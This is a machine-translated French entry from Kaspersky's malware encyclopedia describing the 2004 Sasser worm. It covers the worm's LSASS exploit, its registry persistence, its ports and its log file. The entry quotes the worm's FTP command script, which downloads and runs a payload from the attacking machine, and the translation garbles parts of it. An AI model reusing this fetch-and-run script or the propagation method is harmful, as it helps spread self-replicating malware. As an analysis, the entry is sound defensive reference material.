CE SERVICE PEUT CONTENIR DES TRADUCTIONS GÉNÉRÉES PAR GOOGLE. GOOGLE DÉCLINE TOUTE GARANTIE, EXPLICITE OU IMPLICITE, Y COMPRIS LES GARANTIES D'EXACTITUDE, DE FIABILITÉ, AINSI QUE TOUTE GARANTIE IMPLICITE DE COMMERCIALISATION ET D'ADAPTATION À DES FINS PARTICULIÈRES ET À L'ABSENCE DE CONTREFAÇONS.
Le site internet de Kaspersky Lab a été traduit pour votre commodité en utilisant un logiciel de traduction générée par Google. Des efforts raisonnables ont été faits pour fournir une traduction exacte. Cependant, aucune traduction automatique n'est parfaite et l'objectif n'est pas de remplacer le travail des traducteurs. Le site internet de Kaspersky Lab fournit ces traductions comme un service pour ses utilisateurs, et elles ont été publiées "telles quelles". Aucune garantie, explicite ou implicite, n'est faite au sujet de l'exactitude, de fiabilité ou de conformité de ces traductions faites de l'anglais vers une autre langue. Certains contenus (images, vidéos, Flash, etc.) peuvent ne pas être traduits correctement à cause des limites du logiciel de traduction.
Date de la détection | 05/13/2004 |
Classe | Net-Worm |
Plateforme | Win32 |
Description |
Sasser est un ver Internet qui exploite la vulnérabilité MS Windows LSASS décrite dans le Bulletin de sécurité Microsoft MS04-011 . Microsoft a publié un correctif pour cette vulnérabilité le 13 avril 2004, tandis que Sasser.a a été détecté pour la première fois le 30 avril 2004. Sasser fonctionne de manière très similaire à Lovesan, sauf que Lovesan a exploité une vulnérabilité dans le service PRC DCOM, pas le service LSASS. Sasser affecte les ordinateurs fonctionnant sous Windows 2000, Windows XP, Windows Server 2003. Sasser fonctionne sur toutes les autres versions de Windows mais ne parvient pas à les infecter en attaquant via la vulnérabilité. Sasser est écrit en C / C ++, en utilisant le compilateur Visual C. Le ver est d'environ 15 KL et est emballé par PECompact2. Signes d'infection
PropagationAprès le lancement, Sasser se copie dans le répertoire racine Windows sous le nom avserve.exe et enregistre ce fichier dans la clé d'exécution automatique du registre système: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "avserve.exe" = "% WINDIR% avserve.exe" Sasser crée un identifiant unique 'Jobaka31' dans la RAM pour localiser des copies de lui-même en cas de futures tentatives d'infection. Sasser lance le serveur FTP sur le port TCP 5554, puis lance 128 routines de propagation. Au cours de ce processus, le ver tente d'initier le processus AbortSystemShutdown afin d'interdire le redémarrage du système. Sasser lance une analyse d'adresse IP afin d'identifier les adresses des victimes et envoie une requête au port TCP 445. Si des machines répondent, Sasser exploite la vulnérabilité LSASS pour lancer un shell de commande 'cmd.exe' sur le port TCP 9996. Enfin Sasser, commande à la machine infectée de télécharger et de lancer le composant principal du ver sous le nom "N_up.exe", où "N" est un nombre aléatoire: Écho off echo ouvert [adresse de la machine attaquante] 5554 >> cmd.ftp echo anonyme >> cmd.ftp utilisateur de l'écho echo bin >> cmd.ftp echo get [nombre aléatoire] _up.exe >> cmd.ftp echo bye >> cmd.ftp écho sur ftp -s: cmd.ftp [nombre aléatoire] _up.exe Écho off del cmd.ftp écho sur Par conséquent, une machine peut être attaquée plus d'une fois et contenir plusieurs copies du ver avec des noms d'échantillons tels que: 23101_up.exe 5409_up.exe et ainsi de suite. AutreAprès l'infection, la machine victime génère un message d'erreur à propos d'un échec du service LSASS, après quoi elle peut tenter de redémarrer. Sasser crée le fichier 'win.log' dans le répertoire racine du lecteur C où le ver enregistre les adresses IP de toutes les machines attaquées. |
Lien vers l'original |
|
Découvrez les statistiques de la propagation des menaces dans votre région |